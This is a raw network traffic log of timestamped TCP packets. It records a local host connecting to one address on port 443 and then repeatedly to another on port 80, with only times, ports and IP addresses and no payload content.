Dec 15, 2024 00:22:05.503931999 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.504101038 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.509718895 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.509763002 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.509938002 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.509938002 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.509968996 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.510030985 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.515525103 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.515567064 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.515655041 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.515655041 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.515690088 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.515748024 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.521758080 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.521801949 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.521981001 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.521981001 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.522012949 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.522078037 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.528093100 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.528111935 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.528153896 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.528172970 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.528194904 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.528211117 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.533464909 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.533485889 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.533662081 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.533662081 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.533693075 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.533950090 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.538733959 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.538752079 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.538794994 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.538827896 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.538846016 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.539061069 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.543610096 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.543628931 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.543792009 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.543792009 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.543823957 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.544017076 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.548768997 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.548809052 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.548851013 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.548886061 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.548904896 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.548970938 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.553765059 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.553805113 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.553961039 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.553961039 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.554008007 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.554059982 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.558444023 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.558481932 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.558542013 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.558542967 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.558605909 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.558665991 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.617103100 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.617172003 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.617316008 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.617316008 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.617347956 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.617651939 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.620007992 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.620075941 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.620094061 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.620126963 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.620146036 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.620246887 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.694045067 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.694106102 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.694217920 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.694219112 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.694250107 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.694317102 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.697123051 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.697177887 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.697216034 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.697248936 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.697273970 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.697536945 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.700123072 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.700172901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.700217962 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.700237989 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.700265884 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.700421095 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.703185081 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.703229904 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.703252077 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.703258991 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.703289032 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.703299046 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.706233978 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.706278086 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.706413984 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.706413984 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.706445932 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.706499100 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.709223032 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.709266901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.709290028 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.709300041 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.709332943 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.709343910 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.808995008 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.809027910 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.809077978 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.809142113 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.809178114 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.809200048 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.812037945 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.812088013 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.812114954 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.812122107 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.812150002 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.812159061 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.886281013 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.886343002 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.886349916 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.886379957 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.886403084 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.886487007 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.889308929 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.889359951 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.889422894 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.889422894 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.889455080 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.889770985 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.892364025 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.892412901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.892535925 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.892535925 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.892568111 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.892667055 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.895395041 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.895437956 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.895566940 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.895566940 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.895598888 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.895658970 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.898444891 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.898490906 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.898627996 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.898627996 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.898659945 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.898761034 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.901411057 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.901456118 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.901608944 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.901608944 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:05.901639938 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:05.901706934 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.001430035 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.001461983 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.001514912 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.001583099 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.001616955 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.001765013 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.004517078 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.004561901 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.004585981 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.004591942 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.004620075 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.004628897 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.078345060 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.078418016 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.078449011 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.078485966 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.078514099 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.078542948 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.081049919 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.081095934 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.081126928 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.081139088 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.081167936 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.081275940 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.084110022 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.084161997 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.084191084 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.084203005 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.084228992 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.084304094 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.087112904 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.087171078 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.087193012 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.087203979 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.087256908 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.087256908 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.090142965 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.090187073 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.090218067 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.090229988 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.090257883 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.090311050 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.093174934 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.093223095 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.093252897 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.093265057 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.093291998 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.093312979 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.193561077 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.193634033 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.193794012 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.193794012 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.193859100 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.193926096 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.196751118 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.196816921 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.196856022 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.196928978 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.196978092 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.196978092 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.270268917 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.270330906 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.270421982 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.270422935 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.270486116 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.270548105 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.273308992 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.273358107 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.273531914 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.273533106 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.273596048 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.273732901 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.276350021 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.276391029 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.276573896 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.276573896 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.276638031 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.276702881 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.279381990 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.279424906 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.279444933 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.279462099 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.279496908 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.279623985 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.282427073 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.282479048 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.282522917 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.282536030 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.282562971 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.282649994 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.283171892 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.283257961 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.283269882 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.283353090 CET	443	49730	185.199.109.133	192.168.2.4
Dec 15, 2024 00:22:06.283543110 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:06.291852951 CET	49730	443	192.168.2.4	185.199.109.133
Dec 15, 2024 00:22:25.403263092 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:25.523092031 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:25.523165941 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:25.526041985 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:25.645773888 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.113152981 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.113286018 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.113353968 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:27.321342945 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:27.322473049 CET	49737	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:27.442547083 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.444106102 CET	80	49737	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.444168091 CET	49737	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:27.444334030 CET	49737	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:27.565535069 CET	80	49737	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.567142963 CET	80	49737	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.767513990 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.774488926 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:27.895759106 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:27.897402048 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:28.389102936 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:28.435878038 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:28.801779032 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:28.801826000 CET	80	49737	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:28.801892042 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:28.842180014 CET	49737	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.608877897 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.609708071 CET	49739	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.613938093 CET	49737	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.730906963 CET	80	49735	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:29.730921030 CET	80	49739	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:29.730967999 CET	49735	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.730986118 CET	49739	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.731091022 CET	49739	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.735642910 CET	80	49737	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:29.735687017 CET	49737	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:29.852571964 CET	80	49739	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.079457998 CET	80	49739	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.086843014 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.123331070 CET	49739	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.208184958 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.208431959 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.208431959 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.342701912 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.590099096 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.710149050 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710160017 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710172892 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710180044 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710303068 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710318089 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710333109 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.710402012 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.710419893 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710427999 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710489988 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710532904 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.710665941 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.830172062 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.830180883 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.830255985 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.830276012 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.830349922 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.830354929 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.830791950 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.871602058 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.871862888 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:31.991693020 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:31.991906881 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:32.035602093 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:32.159672976 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:32.224060059 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:32.540268898 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:32.592194080 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:33.008599997 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:33.060960054 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:33.811358929 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:33.812153101 CET	49741	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:33.931817055 CET	80	49740	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:33.931832075 CET	80	49741	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:33.931879044 CET	49740	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:33.931911945 CET	49741	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:33.932033062 CET	49741	80	192.168.2.4	92.53.106.114
Dec 15, 2024 00:22:34.051831961 CET	80	49741	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:34.051853895 CET	80	49741	92.53.106.114	192.168.2.4
Dec 15, 2024 00:22:35.306803942 CET	80	49741	92.53.106.114	192.168.2.4
